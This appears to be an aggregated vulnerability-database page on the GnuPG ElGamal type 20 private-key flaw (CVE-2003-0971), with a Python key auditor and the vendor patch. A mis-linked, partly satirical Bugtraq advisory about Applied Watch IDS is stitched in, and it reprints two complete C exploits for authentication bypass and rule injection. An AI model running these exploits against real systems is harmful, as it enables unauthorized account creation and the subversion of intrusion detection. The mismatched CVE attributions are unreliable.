CVE-2003-0971
CVSS 5.0
Published: 2003-12-15 00:00:00
Last revised: 2016-10-17 22:38:37

[Original] GnuPG (GPG) 1.0.2, and other versions up to 1.2.3, creates ElGamal type 20 (sign+encrypt) keys using the same key component for encryption as for signing, which allows attackers to determine the private key from a signature.


[CNNVD] GnuPG ElGamal Signing Key Private Key Disclosure Vulnerability (CNNVD-200312-024)

        
        GNU Privacy Guard (GnuPG) is an open-source encryption program.
        GnuPG has a flaw in its handling of ElGamal signing keys; a remote attacker can exploit it to obtain the target user's private key.
        GnuPG allows ElGamal keys to be created for both encryption and signing. In version 1.0.2 (January 2000), GnuPG changed how ElGamal keys are created so that encryption would be more efficient (a small secret exponent X is chosen, and a small K is used for encryption). That change, however, causes a problem when such a key is used for signing: the small K used for encryption is also used for signing, and an attacker who obtains a signature made with such a key can use this cryptanalytic method to derive the private key. Because signatures made with the key are used to bind user IDs and other important keys, such signatures are normally made by the primary ElGamal key, so even a key that has never signed a document may be compromised by this flaw.
        Ordinary (type 16) encrypt-only ElGamal keys are not affected, because GnuPG does not allow keys of that type to be used for signing. Only ElGamal sign+encrypt keys (type 20) are vulnerable.
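
The defensive counterpart to the flaw described above is to find type 20 keys in a keyring before they are relied on. The Python below is an added example, not GnuPG code and not part of the CNNVD record: it walks OpenPGP packets (old- and new-format headers), reads the public-key algorithm id from each v3 or v4 key and subkey packet, and flags algorithm 20 together with every subkey hanging off a type 20 primary, which is the same rule the vendor patch applies in getkey.c. The SAMPLE_KEYRING is constructed inside the block with toy MPI values (not real keys), and the PUBKEY_ALGO_* constant names mirror GnuPG's but are defined locally.

```python
"""Flag ElGamal sign+encrypt (algorithm 20) keys in OpenPGP key material.
Added example, not GnuPG code; same rule as the vendor patch: a type 20 primary
is unusable, and so is every subkey bound by one. Framing per RFC 2440/4880."""
import struct

PUBKEY_ALGO_RSA = 1
PUBKEY_ALGO_ELGAMAL_E = 16   # encrypt-only ElGamal (type 16): not affected
PUBKEY_ALGO_DSA = 17
PUBKEY_ALGO_ELGAMAL = 20     # sign+encrypt ElGamal (type 20): vulnerable
KEY_TAGS = {5: "secret key", 6: "public key", 7: "secret subkey", 14: "public subkey"}
PRIMARY_TAGS = {5, 6}

def iter_packets(data):
    """Yield (tag, body) for every packet, handling old- and new-format headers."""
    pos = 0
    while pos < len(data):
        ctb = data[pos]
        pos += 1
        if not ctb & 0x80:
            raise ValueError("bad packet header at offset %d" % (pos - 1))
        if ctb & 0x40:                               # new-format header
            tag = ctb & 0x3F
            b0 = data[pos]
            pos += 1
            if b0 < 192:
                length = b0
            elif b0 < 224:
                length = ((b0 - 192) << 8) + data[pos] + 192
                pos += 1
            elif b0 == 255:
                length = struct.unpack(">I", data[pos:pos + 4])[0]
                pos += 4
            else:
                raise ValueError("partial body length not expected in a key packet")
        else:                                        # old-format header
            tag = (ctb >> 2) & 0x0F
            ltype = ctb & 0x03
            if ltype == 3:                           # indeterminate: rest of input
                length = len(data) - pos
            else:
                nbytes = 1 << ltype
                length = int.from_bytes(data[pos:pos + nbytes], "big")
                pos += nbytes
        body = data[pos:pos + length]
        if len(body) != length:
            raise ValueError("truncated packet")
        pos += length
        yield tag, body

def key_algo(body):
    """Algorithm id of a (sub)key packet body; v3 carries a 2-byte validity field first."""
    version = body[0]
    if version == 4:
        return body[5]
    if version in (2, 3):
        return body[7]
    raise ValueError("unsupported key packet version %d" % version)

def audit_keyring(data):
    """One (tag name, algo, reason or None) per key packet, in keyring order."""
    findings, primary_is_type20 = [], False
    for tag, body in iter_packets(data):
        if tag not in KEY_TAGS:
            continue                 # user IDs, signatures, trust packets: skip
        algo = key_algo(body)
        if tag in PRIMARY_TAGS:
            primary_is_type20 = algo == PUBKEY_ALGO_ELGAMAL
            reason = "type 20 ElGamal sign+encrypt primary key" if primary_is_type20 else None
        elif algo == PUBKEY_ALGO_ELGAMAL:
            reason = "type 20 ElGamal subkey"
        elif primary_is_type20:      # binding signature made by an exposed primary
            reason = "subkey bound by a type 20 primary"
        else:
            reason = None
        findings.append((KEY_TAGS[tag], algo, reason))
    return findings

# Constructed sample keyring: toy MPI values, not real keys; only the framing matters.
def _mpi(value):
    return struct.pack(">H", value.bit_length()) + value.to_bytes((value.bit_length() + 7) // 8, "big")

def _packet(tag, body):              # old-format header, two-byte length (type 1)
    return bytes([0x80 | (tag << 2) | 1]) + struct.pack(">H", len(body)) + body

def _v4_key(tag, algo, mpis):
    return _packet(tag, bytes([4]) + struct.pack(">I", 1070000000) + bytes([algo])
                   + b"".join(_mpi(m) for m in mpis))

SAMPLE_KEYRING = (
    _v4_key(6, PUBKEY_ALGO_ELGAMAL, [0xFFFF, 0x7, 0x1234])          # p, g, y
    + _packet(13, b"Constructed Example <example@example.invalid>")  # user ID
    + _v4_key(14, PUBKEY_ALGO_ELGAMAL_E, [0xFFFF, 0x7, 0x4321])
    + _v4_key(6, PUBKEY_ALGO_DSA, [0xFFFF, 0x3F, 0x7, 0x1234])       # p, q, g, y
    + _v4_key(14, PUBKEY_ALGO_RSA, [0xC0FFEE, 0x10001])             # n, e
)

if __name__ == "__main__":
    for name, algo, reason in audit_keyring(SAMPLE_KEYRING):
        print("%-14s algo=%-2d %s" % (name, algo, reason or "ok"))
```

Run against a real export (gpg --export in binary form) the audit lists every key and subkey with its algorithm id; the encrypt-only type 16 subkey in the sample is reported not because of its own algorithm but because its binding signature comes from a type 20 primary, which is exactly the second case the patch adds in getkey.c.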
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:gnu:privacy_guard:1.0.7      GNU GNU Privacy Guard 1.0.7
cpe:/a:gnu:privacy_guard:1.2        GNU GNU Privacy Guard 1.2
cpe:/a:gnu:privacy_guard:1.0.6      GNU GNU Privacy Guard 1.0.6
cpe:/a:gnu:privacy_guard:1.0.5      GNU GNU Privacy Guard 1.0.5
cpe:/a:gnu:privacy_guard:1.2.3      GNU GNU Privacy Guard 1.2.3
cpe:/a:gnu:privacy_guard:1.0.4      GNU GNU Privacy Guard 1.0.4
cpe:/a:gnu:privacy_guard:1.2.2      GNU GNU Privacy Guard 1.2.2
cpe:/a:gnu:privacy_guard:1.0.3      GNU GNU Privacy Guard 1.0.3
cpe:/a:gnu:privacy_guard:1.2.1      GNU GNU Privacy Guard 1.2.1
cpe:/a:gnu:privacy_guard:1.0.2      GNU GNU Privacy Guard 1.0.2
cpe:/a:gnu:privacy_guard:1.0.3b
cpe:/a:gnu:privacy_guard:1.2.2:rc1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:10982    GnuPG (GPG) 1.0.2, and other versions up to 1.2.3, creates ElGamal type 20 (sign+encrypt) keys using the same key component for encryption a...
*OVAL describes in detail how to detect this vulnerability; see the related OVAL definition for more technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0971
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0971
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-024
(official data source) CNNVD

- Other links and resources

ftp://patches.sgi.com/support/free/security/advisories/20040202-01-U.asc
(UNKNOWN)  SGI  20040202-01-U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000798
(UNKNOWN)  CONECTIVA  CLA-2003:798
http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000276.html
(VENDOR_ADVISORY)  CONFIRM  http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000276.html
http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000277.html
(PATCH)  CONFIRM  http://lists.gnupg.org/pipermail/gnupg-announce/2003q4/000277.html
http://marc.info/?l=bugtraq&m=106995769213221&w=2
(UNKNOWN)  BUGTRAQ  20031127 GnuPG's ElGamal signing keys compromised
http://www.debian.org/security/2004/dsa-429
(UNKNOWN)  DEBIAN  DSA-429
http://www.kb.cert.org/vuls/id/940388
(UNKNOWN)  CERT-VN  VU#940388
http://www.mandriva.com/security/advisories?name=MDKSA-2003:109
(UNKNOWN)  MANDRAKE  MDKSA-2003:109
http://www.novell.com/linux/security/advisories/2003_048_gpg.html
(UNKNOWN)  SUSE  SuSE-SA:2003:048
http://www.redhat.com/support/errata/RHSA-2003-390.html
(UNKNOWN)  REDHAT  RHSA-2003:390
http://www.redhat.com/support/errata/RHSA-2003-395.html
(UNKNOWN)  REDHAT  RHSA-2003:395
http://www.securityfocus.com/bid/9115
(VENDOR_ADVISORY)  BID  9115

- Vulnerability information

GnuPG ElGamal Signing Key Private Key Disclosure Vulnerability
Medium  Design Error
2003-12-15 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * The following patch is for GnuPG 1.2.3:
        Index: getkey.c
        ===================================================================
        RCS file: /cvs/gnupg/gnupg/g10/getkey.c,v
        retrieving revision 1.78.2.20
        diff -u -r1.78.2.20 getkey.c
        --- getkey.c 21 Jul 2003 14:55:00 -0000 1.78.2.20
        +++ getkey.c 27 Nov 2003 00:32:30 -0000
        @@ -1655,6 +1655,11 @@
        if ( x ) /* mask it down to the actual allowed usage */
        key_usage &= x;
        }
        +
        + /* Type 20 Elgamal keys are not usable. */
        + if(pk->pubkey_algo==PUBKEY_ALGO_ELGAMAL)
        + key_usage=0;
        +
        pk->pubkey_usage = key_usage;
        if ( !key_expire_seen ) {
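        Review bot: the new check zeroes key_usage for every PUBKEY_ALGO_ELGAMAL primary key, which strips the encryption capability along with signing; that is the intent (the comment says the keys are "not usable"), but the comment gives no reason, and a later reader seeing only key_usage=0 cannot tell a deliberate retirement from a capability bug. Suggest stating it: /* Type 20 Elgamal keys are not usable: a signature made with one leaks the private key. */ Placing the check after the key_usage &= x masking is correct, since it has to override whatever usage flags the key's own self-signature claims.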
        @@ -1869,6 +1874,13 @@
        if ( x ) /* mask it down to the actual allowed usage */
        key_usage &= x;
        }
        +
        + /* Type 20 Elgamal subkeys or any subkey on a type 20 primary are
        + not usable. */
        + if(mainpk->pubkey_algo==PUBKEY_ALGO_ELGAMAL
        + || subpk->pubkey_algo==PUBKEY_ALGO_ELGAMAL)
        + key_usage=0;
        +
        subpk->pubkey_usage = key_usage;
        p = parse_sig_subpkt (sig->hashed, SIGSUBPKT_KEY_EXPIRE, NULL);
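        Review bot: this hunk covers two cases, a type 20 subkey and any subkey under a type 20 primary (mainpk->pubkey_algo==PUBKEY_ALGO_ELGAMAL); the second is the important one and the comment only names it without saying why, so add that the subkey's binding signature was made by a primary whose private key must be treated as exposed, which is why the binding cannot be trusted. The placement matches the first hunk (after the key_usage &= x mask, before pubkey_usage is stored), which is what makes the override stick.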
        Index: keygen.c
        ===================================================================
        RCS file: /cvs/gnupg/gnupg/g10/keygen.c,v
        retrieving revision 1.90.2.11
        diff -u -r1.90.2.11 keygen.c
        --- keygen.c 16 Jul 2003 03:09:15 -0000 1.90.2.11
        +++ keygen.c 27 Nov 2003 00:32:31 -0000
        @@ -958,8 +958,6 @@
        tty_printf( _(" (%d) DSA (sign only)\n"), 2 );
        if( addmode )
        tty_printf( _(" (%d) ElGamal (encrypt only)\n"), 3 );
        - if (opt.expert)
        - tty_printf( _(" (%d) ElGamal (sign and encrypt)\n"), 4 );
        tty_printf( _(" (%d) RSA (sign only)\n"), 5 );
        if (addmode)
        tty_printf( _(" (%d) RSA (encrypt only)\n"), 6 );
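        Review bot: dropping the "(4) ElGamal (sign and encrypt)" entry leaves the displayed menu numbered 1, 2, 3, 5, 6, which is fine only if the selection code stops accepting 4 as well; that removal is in the second keygen.c hunk, so the two hunks must not be applied separately. A one-line comment here that 4 is deliberately retired (rather than renumbering RSA, which would break any scripted answers that expect 5 and 6) would stop the next maintainer from "fixing" the gap.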
        @@ -989,21 +987,6 @@
        algo = PUBKEY_ALGO_RSA;
        *r_usage = PUBKEY_USAGE_SIG;
        break;
        - }
        - else if( algo == 4 && opt.expert)
        - {
        - tty_printf(_(
        -"The use of this algorithm is only supported by GnuPG. You will not be\n"
        -"able to use this key to communicate with PGP users. This algorithm is also\n"
        -"very slow, and may not be as secure as the other choices.\n"));
        -
        - if( cpr_get_answer_is_yes("keygen.algo.elg_se",
        - _("Create anyway? ")))
        - {
        - algo = PUBKEY_ALGO_ELGAMAL;
        - *r_usage = PUBKEY_USAGE_ENC | PUBKEY_USAGE_SIG;
        - break;
        - }
        }
        else if( algo == 3 && addmode ) {
        algo = PUBKEY_ALGO_ELGAMAL_E;
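        Review bot: with the algo == 4 && opt.expert branch removed, an answer of 4 now falls through past the algo == 3 && addmode branch to whatever default handling follows; confirm that path reports an invalid selection and re-prompts instead of quietly picking another algorithm. The removed branch also held the cpr_get_answer_is_yes("keygen.algo.elg_se", ...) prompt, so any scripted driver that answered that prompt key will never see it again; worth a line in the release announcement.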
        Vendor patches:
        MandrakeSoft
        ------------
        MandrakeSoft has released a security advisory (MDKSA-2003:109) and the corresponding patches:
        MDKSA-2003:109:Updated gnupg packages fix vulnerability with ElGamal signing keys
        Link:
        http://www.linux-mandrake.com/en/security/2003/2003-109.php

        Patch download:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/gnupg-1.0.7-3.2.C21mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/gnupg-1.0.7-3.2.C21mdk.src.rpm
        Corporate Server 2.1/x86_64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/RPMS/gnupg-1.0.7-3.2.C21mdk.x86_64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/SRPMS/gnupg-1.0.7-3.2.C21mdk.src.rpm
        Mandrake Linux 9.0:
        The above update packages can also be downloaded from any of the mirror FTP servers listed at:
        
        http://www.mandrakesecure.net/en/ftp.php

- Vulnerability information (F32282)

_BSSADV-0000.txt (PacketStormID:F32282)
2003-12-01 00:00:00
The Bugtraq Team  bugtraq.org
exploit,remote,vulnerability
CVE-2003-0970,CVE-2003-0971

Bugtraq Security Systems Security Advisory - Multiple vulnerabilities have been discovered in the Applied Watch Command Center IDS. Two exploits have been released to demonstrate these flaws. The first, appliedsnatch.c, allows a remote attacker to add a user to the console without having to authenticate to the system. The second, addrule.c, allows a remote attacker to add custom IDS alerts to all sensor nodes in a network, enabling a human denial-of-service attack by making good packets look bad.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

	        Bugtraq Security Systems, Incorporated
 			    www.bugtraq.org

                           Security Advisory

Advisory Name: Multiple Issues in Applied Watch Command Center
 Release Date: 11/27/2003
  Application: Applied Watch
     Platform: Linux (IA32)
               Linux (sparc)
	       Linux (sparc64)
	       Linux (hppa)
	       Linux (ppc)
	       Linux (xbox)
	       Linux (IA64)
	       SUN Solaris (IA32)
	       SUN Solaris (sparc)
	       SUN Solaris (sparc64)
	       OpenBSD (386)
               HPUX (hppa)
	       HPUX (IA64)
               Compaq True64
	       Microsoft Windows NT (Alpha)
	       Microsoft Windows NT (IA32)
     Severity: Secure protocol implementation weaknesses, allows for
               authentication bypass and compromise of IDS nodes.
       Author: The Bugtraq Team, Collectively  [bugtraq@bugtraq.org]
Vendor Status: Patches pending.
CVE Candidate: CAN-2003-0970 - Authentication Bypass to Add IDS Rules
               CAN-2003-0971 - Authentication Bypass to Add Users
    Reference: www.bugtraq.org/advisories/_BSSADV-0000.txt 


Overview:
      The Applied Watch Command Center boasts the industry's first
truly OS-native platform for managing network threats in real-time.  It
frees users from the unreliable, more difficult, and less-secure 
Web-based monitoring environment of Snort IDS sensors.  From a central,
desktop console Supporting Mac, Linux, Unix, and Windows, thousands of 
IDS agents and the server can be monitored.  The Command Center gives 
you these benefits:

      1. Interprets alerts generated by third-party solutions, parsing
         the alerts into high, medium, and low priority;
      2. Allows you to identify false positives;
      3. Lets you store notes on events to prevent duplication of 
         effort, saving valuable man-hours;
      4. Provides greater security with an OS-native, desktop console;
      5. Lets you avoid the high cost of Security Information Management
         Systems (SIMs); and
      6. Reduces your IDS cost of ownership.

      It should also be noted that the lead developer of this system is
named Jason Ish, who is a member of the core OpenBSD development team
and is therefore a security expert.  He has a son named Theo, named after
the great pioneer of proactive security, Theo Deraadt.

      There exist a number of vulnerabilities in the various components
of the Applied Watch software suite; this advisory being the first of 
many to come regarding the various logic-related security vulnerabilities
in the software.  After all such problems are eliminated from the codebase,
we will begin releasing another set of advisories concerning multiple 
instances in the code that allow for the remote execution of arbitrary code
throughout the various components of this system.


Details:

[1] Adding a User

Using the attached program, appliedsnatch.c, a malicious individual on a
network protected by the Applied Watch Solution can add new users to a 
console, without having to authenticate to the system.

- --- begin appliedsnatch.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
	{\
	  buf[(i) ++] = ((val) >> 24) & 0xff;\
	  buf[(i) ++] = ((val) >> 16) & 0xff;\
	  buf[(i) ++] = ((val) >> 8) & 0xff;\
	  buf[(i) ++] = (val) & 0xff;\
	}

int main(int argc, char *argv[])
{
  unsigned char *buf;
  unsigned int idx, i;
  size_t userlen, passlen, buflen, lenidx;
  int sock;
  struct sockaddr_in sin;
  unsigned char respbuf[28];
  ssize_t n;
  SSL_CTX *sslctx;
  SSL *ssl;
  
  if (argc != 5) { fprintf(stderr, "usage: %s <host> <port> <user> <pass>\n", argv[0]); exit(1); }
  userlen = strlen(argv[3]);
  passlen = strlen(argv[4]);
  buf = malloc(buflen = 12 + 4 + userlen + 4 + 4 + passlen + 4 + 4 + 4);
  memset(buf, 0, buflen);
  idx = 0;
  PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
  PUT_UINT32(idx, 0x6a);
  lenidx = idx;
  PUT_UINT32(idx, 0xf00fc7c8);
  //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
  PUT_UINT32(idx, userlen);
  memcpy(&buf[idx], argv[3], userlen); idx += userlen;
  idx |= 3; idx ++;
  PUT_UINT32(idx, passlen);
  memcpy(&buf[idx], argv[4], passlen); idx += passlen;
  idx |= 3; idx ++;
  PUT_UINT32(idx, 0x1);
  PUT_UINT32(idx, 0x1);
  PUT_UINT32(lenidx, idx);
  printf("connecting\n");
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(atoi(argv[2]));
  if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
  {
    struct hostent *he;
    
    if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
    memcpy(&sin.sin_addr, he->h_addr, 4);
  }
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
  printf("doing ssl handshake\n");
  SSL_load_error_strings();
  SSL_library_init();
  if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
  if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
  if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
  if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
  printf("sending %u bytes:\n", idx);
  for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
  if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
  printf("\nreading:\n");
  i = 0;
  while (i < sizeof(respbuf))
  {
    if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }
    i -= n;
  }
  for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
  printf("\n");
  printf("adding user \"%s\" with password \"%s\" %s\n", argv[3], argv[4], (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
  SSL_shutdown(ssl);
  close(sock);
  return 0;
}

- --- end appliedsnatch.c ---


[2] Adding a Rule

Using the second attached program, addrule.c, a malicious individual can
introduce custom IDS alerts to all sensor nodes on a network, allowing a
human denial-of-service attack against the security experts monitoring the
console.  This is a valid technique for subverting intrusion detection 
systems.  This is also a demonstration of the "sometimes good packets look
like bad packets, while bad packets go unnoticed by the intrusion detection
system" concept.

- --- begin addrule.c ---

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/ssl.h>

#define PUT_UINT32(i, val)\
	{\
	  buf[(i) ++] = ((val) >> 24) & 0xff;\
	  buf[(i) ++] = ((val) >> 16) & 0xff;\
	  buf[(i) ++] = ((val) >> 8) & 0xff;\
	  buf[(i) ++] = (val) & 0xff;\
	}

int main(int argc, char *argv[])
{
  unsigned char *buf;
  unsigned int idx, i;
  size_t rulelen, buflen, lenidx;
  int sock;
  struct sockaddr_in sin;
  unsigned char respbuf[28];
  ssize_t n;
  SSL_CTX *sslctx;
  SSL *ssl;
  unsigned char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE* *GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";
  
  if (argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); exit(1); }
  rulelen = strlen(ruleset);
  buf = malloc(buflen = 12 + 4 + 4 + 4 + rulelen + 4);
  memset(buf, 0, buflen);
  idx = 0;
  PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
  PUT_UINT32(idx, 0x6f);
  lenidx = idx;
  PUT_UINT32(idx, 0xf00fc7c8);
  //PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
  PUT_UINT32(idx, 0);
  PUT_UINT32(idx, 1);
  PUT_UINT32(idx, rulelen);
  memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;
  idx |= 3; idx ++;
  PUT_UINT32(lenidx, idx);
  printf("connecting\n");
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = htons(atoi(argv[2]));
  if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
  {
    struct hostent *he;
    
    if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()"); exit(1); }
    memcpy(&sin.sin_addr, he->h_addr, 4);
  }
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) { perror("connect()"); exit(1); }
  printf("doing ssl handshake\n");
  SSL_load_error_strings();
  SSL_library_init();
  if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr, "SSL_CTX_new()\n"); exit(1); }
  if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n"); exit(1); }
  if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1); }
  if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
  printf("sending %u bytes:\n", idx);
  for (i = 0; i < idx; i ++) printf("%.2x ", buf[i]);
  if (SSL_write(ssl, buf, idx) != idx) { perror("write()"); exit(1); }
  printf("\nreading:\n");
  i = 0;
  while (i < sizeof(respbuf))
  {
    if ((n = SSL_read(ssl, &respbuf[i], sizeof(respbuf) - i)) < 0) { perror("read()"); exit(1); }
    i -= n;
  }
  for (i = 0; i < sizeof(respbuf); i ++) printf("%.2x ", respbuf[i]);
  printf("\n");
  printf("adding nasty ruleset %s\n", (memcmp(&respbuf[16], "\x00\x00\x00\x00", 4) == 0)? "succeeded" : "failed");
  SSL_shutdown(ssl);
  close(sock);
  return 0;
}

- --- end addrule.c ---


Vendor Response:
     Bugtraq Security have attempted to contact the vendor multiple
times since the discovery of these vulnerabilities without success.  A
public statement issued by the founder of the company, Eric Hines, helps
us understand why the company was unavailable for comment at the time:

     "You've got to realize that these people are walking around with
exploits that vendors haven't even heard of yet.  They're pissed and 
they've got this almost God-like power that enables them to break into
any network that they want," Hines said.  He reported that FateLabs.com
was knocked offline last week by a denial-of-service attack immediately
after the security firm published an advisory about a security bug.

     We expect that once their network recovers from said incident, that
they will issue binary patches to both their clients and help reduce the
threat of compromise against those networks. Undoubtedly they are aware
of these vulnerabilities already, and were hoping they would be brought
to public attention as, according to their website, they are "soldiers
for full disclosure".

ThreatCon:
      The release of this information and exploits increases the Global
ThreatCon Level to a record-breaking index of 9/13 (more dangerous than
normal) level.  We hope that Applied Watch will release their patches 
soon so that the ThreatCon can be lowered to a more reasonable level.  If
you have any questions regarding the Global ThreatCon, please visit
	http://www.bugtraq.org/threatcon.html


Recommendation:
      If the security of your network is required, then Fatelabs /
AppliedWatch products should be removed or disabled on the host in
question.  If it is not required, enterprises should deploy vendor patches
for the above vulnerabilities when they become available.  In addition,
enterprises should look to remove all default services if not required in
production systems or adequately protect those that are required and 
undertake other obvious security measures.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2003-0960 - Logical error in Applied Watch Console allowing user-adds
  CAN-2003-0961 - Logical error in Applied Watch Nodes allowing rule-adds

Bugtraq Security Systems Vulnerability Reporting Policy: 
      http://www.bugtraq.org/research/policy/

Bugtraq Security Systems Advisory Archive:
      http://www.bugtraq.org/advisories.html

Bugtraq Security Systems PGP Key:
      http://www.bugtraq.org/pgp_key.asc

Bugtraq Security Systems is currently seeking application security experts 
to fill several consulting positions.  Applicants should have strong 
application development skills and be able to perform application security
design reviews, code reviews, and application penetration testing.  Please
send resumes to jobs@bugtraq.org

Copyright 2003 Bugtraq Security Systems. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE/xqQad3IqHnpF3voRAk2vAJ9a7JgZ8p/FRCdgN/qjqYMEyYnj+QCgkGor
vYwTicr3iCtfdrbxc0eeocY=
=GAEl
-----END PGP SIGNATURE-----
    

- Vulnerability information

2869
GnuPG ElGamal Encrypt+Sign Private Key Disclosure
Local Access Required, Remote / Network Access Cryptographic
Loss of Confidentiality, Loss of Integrity

- Vulnerability description

GnuPG has a serious flaw that compromises any ElGamal key used for signing or encrypting material. When GnuPG creates ElGamal sign+encrypt keys (type 20), it does so in a cryptographically weak way. This can be exploited to compromise the private key.

- Timeline

2003-11-27 Unknown
Unknown Unknown

- Solution

Upgrade to version 1.2.3 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the patch provided by the vendor, which is applied to vulnerable 1.2.3 distributions.

- References

- Credit

- Vulnerability information

GnuPG ElGamal Signing Key Private Key Compromise Vulnerability
Design Error 9115
Yes No
2003-11-27 12:00:00 2009-07-12 12:56:00
Discovery of this issue is credited to Phong Q. Nguyen.

- Affected program versions

SGI ProPack 2.4
SGI ProPack 2.3
RedHat gnupg-1.2.1-3.i386.rpm
+ RedHat Linux 9.0 i386
RedHat gnupg-1.0.7-6.i386.rpm
+ RedHat Linux 8.0 i386
RedHat gnupg-1.0.6-5.i386.rpm
+ RedHat Linux 7.3 i386
RedHat gnupg-1.0.6-3.ia64.rpm
+ RedHat Linux 7.2 ia64
RedHat gnupg-1.0.6-3.i386.rpm
+ RedHat Linux 7.2 i386
RedHat gnupg-1.0.4-11.i386.rpm
+ RedHat Linux 7.1 i386
GNU GNU Privacy Guard 1.2.3
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.2
+ Turbolinux Turbolinux Desktop 10.0
GNU GNU Privacy Guard 1.2.2 -rc1
+ S.u.S.E. Linux Personal 8.2
GNU GNU Privacy Guard 1.2.2 -r1
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
GNU GNU Privacy Guard 1.2.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
GNU GNU Privacy Guard 1.2.1
+ Conectiva Linux 9.0
+ OpenPKG OpenPKG 1.2
+ RedHat Linux 9.0 i386
+ Terra Soft Solutions Yellow Dog Linux 3.0
GNU GNU Privacy Guard 1.2
GNU GNU Privacy Guard 1.0.7
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ MandrakeSoft apcupsd 2006.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ OpenPKG OpenPKG 1.1
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux Advanced Work Station 2.1
+ Sun Linux 5.0.5
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
